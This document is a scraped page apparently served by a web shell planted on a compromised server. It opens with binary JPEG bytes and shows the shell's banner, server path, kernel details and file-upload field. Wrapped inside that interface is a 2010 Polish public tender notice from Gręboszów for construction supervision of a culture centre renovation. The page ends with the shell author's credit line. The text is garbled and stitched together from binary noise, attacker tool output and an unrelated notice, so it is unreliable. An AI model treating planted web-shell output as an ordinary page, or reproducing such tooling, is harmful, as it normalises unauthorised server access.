JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100210/38578-N-2010.html

<p class="kh_header"><b>Gręboszów: Pełnienie nadzoru budowlanego inwestorskiego nad robotami budowlanymi dla realizacji zadania pn. Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa wraz z zagospodarowaniem terenu centrum Gręboszowa</b><br>
<b>Numer ogłoszenia: 38578 - 2010; data zamieszczenia: 10.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru budowlanego inwestorskiego nad robotami budowlanymi dla realizacji zadania pn. Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa wraz z zagospodarowaniem terenu centrum Gręboszowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest  Pełnienie funkcji inspektora nadzoru inwestorskiego nad robotami budowlanymi dla zadania  pn.  Remont oraz wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w  Gręboszowie  wraz z zagospodarowaniem terenu centrum Gręboszowa .
  2.  Wartość robót budowlanych  według kosztorysu inwestorskiego wynosi -  kwota netto  1 mln zł.
  3.  Zakres zamówienia obejmuje pełnienie funkcji Inspektora Nadzoru nad  następującymi elementami: 
       3.1  Remont i wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie 
              usytuowanego  na działce nr 599, pow. zabudowy 10,00x18,00 =180,00 m2, pow. użytkowa
              161,78 m2,  kubatura  882,00 m3, 
               3.1.1 Roboty budowlane
               1) Roboty rozbiórkowe i demontażowe
               2) Stolarka okienna
   3) Elewacje z ociepleniem budynku
        4) Okładziny ścian wewnętrznych i sufitów 
        5) Roboty posadzkarskie
        6) Wykonanie postumentu pod scenę
        7) Roboty malarskie
        8) Instalacja wentylacyjna i spalinowa
        9) Stolarka drzwiowa
      10) Instalacja centralnego ogrzewania
      11) Instalacja wodociągowa i kanalizacyjna 
      12) Instalacja gazowa
      13) Instalacja kanalizacyjna zewnętrzna
      14) Instalacja elektryczna
           3.1.2 Wyposażenie budynku Gminnego Centrum Kultury i Czytelnictwa w Gręboszowie
1)	projektor multimedialny           1 kpl
2)	ekran projekcyjny                     1 kpl
3)	sprzęt nagłośnieniowy              1 kpl
4)	laptop multimedialny                1 kpl
3.2	  Budowa i wyposażenie małej architektury
              3.2.1   Stylowa wiata przystankowa na działce  nr 361 w Gręboszowie,  pow. zabudowy 19,63 m2, 
                        pow. użytkowa 15,89 m2, kubatura 71,65 m3
        3.2.2 Wyposażenie małej architektury;
1)	stylowa tablica informacyjna turystyczna  1 kpl 
2)	stylowa latarnia parkowa solarna                8 szt
3)	stylowe kosze na śmieci                              6 szt
4)	stylowe ławki ogrodowe                             9 szt
3.3	Zagospodarowanie terenu centrum Gręboszowa   
3.3.1 Place, parkingi, chodniki   1712,09  m2 (dz. nr 599,361,846/2, 362)
3.3.2 Odwodnienie placów, parkingów, chodników (dz. nr 599, 846/2,  584, 361, 362, 398)
3.3.3 Plac dojazdowy do garażu OSP 131,75 m2 (dz. nr 362).
                    3.4    Urządzanie i porządkowanie terenów zielonych 
2.4.1 Roboty w zakresie porządkowania terenów zielonych 
         1) Oczyszczenie terenu z resztek budowlanych gruzu i śmieci 195,60 m2
         2) Rozścielenie ziemi urodzajnej 204,62 m2
         3) Sadzenie drzew i krzewów iglastych 124 szt.
         4) Wykonanie trawników 115 m2
         5) Obsadzenie kwietników 114 m2
4.  Szczegółowy zakres robót zawiera specyfikacja przetargowa zamieszczona na stronie internetowej http:
     www.wrotamalopolski.pl BIP w Małopolsce, gmina Gręboszów, zamówienia publiczne.
5.  W zakres obowiązków Inspektora Nadzoru wchodzi  pełny  zakres  czynności  określonych w  przepisach 
     ustawy  z dnia 7 lipca 1994 r. - Prawo budowlane  a w szczególności:
      1) reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej  realizacji 
          z projektem budowlanym, dokumentacją prawną i  przepisami wiedzy technicznej,
      2) sprawowanie jakości wykonywanych robót i wbudowanych materiałów budowlanych,  a w szczególności 
          zapobieganie zastosowaniu materiałów  budowlanych wadliwych  i niedopuszczonych do stosowania
          w budownictwie,
      3) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,    uczestniczenie 
          w próbach i odbiorach technicznych oraz przygotowanie i udział w czynnościach odbioru wykonanych 
          robót i przekazaniu przedmiotu użytkowania  do użytkowania,
      4) potwierdzenie faktycznie wykonanych robót oraz usunięcia wad, 
      5) kontrolowanie rozliczenia robót.
6.   Ponadto do obowiązków Inspektora nadzoru należy:
      1) nadzorowanie wypełniania warunków umowy zawartej pomiędzy Gminą Gręboszów a wykonawcą robót
 2) monitorowanie realizacji zadania, 
3)  egzekwowanie jakości zgodnie ze Szczegółowymi Specyfikacjami Technicznymi,
      4) obsługa okresu gwarancyjnego,
      5) kontrola przestrzegania przepisów bezpieczeństwa i ochrony zdrowia, przepisów przeciwpożarowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć: Wykaz sprawowanych  nadzorów  nad  robotami  budowlanymi (sporządzony wg wzoru stanowiącego załącznik nr 4 do  SIWZ ) w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania, a jeżeli 
okres  prowadzenia  działalności  jest krótszy w tym okresie, z podaniem ich  rodzaju  i wartości, daty i miejsca wykonania. Wykonawca winien  wykazać, że  nadzorował   tym okresie,  co   najmniej   2  zamówienia,  i każde odpowiadające swoim rodzajem  i minimum  wartości netto 1,0 mln   robotom  budowlanym stanowiącym   przedmiot zamówienia, tj;  budowa, przebudowa, remont budynków, 
zagospodarowanie  terenu  wokół budynków,  potwierdzone referencjami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć: wykaz osób,  które  będą uczestniczyć w wykonaniu  zamówienia, wraz  z informacjami  na temat ich kwalifikacji zawodowych,   doświadczenia   i wykształcenia niezbędnych do wykonania   zamówienia, a także zakresu  wykonywanych przez nie  czynności, oraz informacjami  o podstawie 
dysponowania tymi osobami (sporządzonego według wzoru stanowiącego  załącznik nr 5 do  SIWZ).   
Zamawiający wymaga aby Wykonawca dysponował  osobą lub osobami  posiadającymi następujące uprawnienia  do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie nadzorowania nad  robotami stanowiącymi przedmiot zamówienia.
a) budowlane w specjalności konstrukcyjno -  budowlanej lub odpowiadające  im   równoważne uprawnienia budowlane,
b) budowlane w specjalności instalacyjnej w zakresie  instalacji i urządzeń  elektrycznych  lub odpowiadające  im  równoważne uprawnienia budowlane,
c) budowlane w specjalności  instalacyjnej  w zakresie  sieci, instalacji  i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych  i kanalizacyjnych  lub odpowiadające  im   równoważne uprawnienia budowlane . 
Należy załączyć odpisy  (kserokopie potwierdzone za zgodność) odpowiednich uprawnień budowlanych umożliwiających  sprawowanie funkcji  inspektora nadzoru oraz  aktualne zaświadczenia o przynależności jego do samorządu   zawodowego lub inne porównywalne dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć aktualne ubezpieczenie od odpowiedzialności cywilnej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej 
z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	Zmiana terminu realizacji przedmiotu umowy;
a) zmiany spowodowane warunkami atmosferycznymi, w szczególności; klęski żywiołowe, 
    warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie 
    prób i sprawdzeń, dokonywanie odbiorów,
             b) zmiany będące następstwem okoliczności leżących po stronie zamawiającego,
                 w szczególności; wstrzymanie robót przez zamawiającego,
             c) inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące 
                 niemożliwością prowadzenia prac.
             W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania
             umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania 
             jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.
2)	Zmiany osobowe;
a) Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne 
     legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa 
     w ustawie Prawo budowlane lub innych ustawach, 
b)  Zmiana podwykonawców,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl      BIP w Małopolsce/gmina Gręboszów/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów 144, pokój nr 2 (na parterze) lub za pośrednictwem pocztowym po uprzednim złożeniu wniosku nie później niż 6 dni przed terminem otwarcia ofert.Cena 50zł+22%VAT..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 09:00, miejsce: Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 11(piętro) - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach programu Program Rozwoju Obszarów Wiejskicj na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com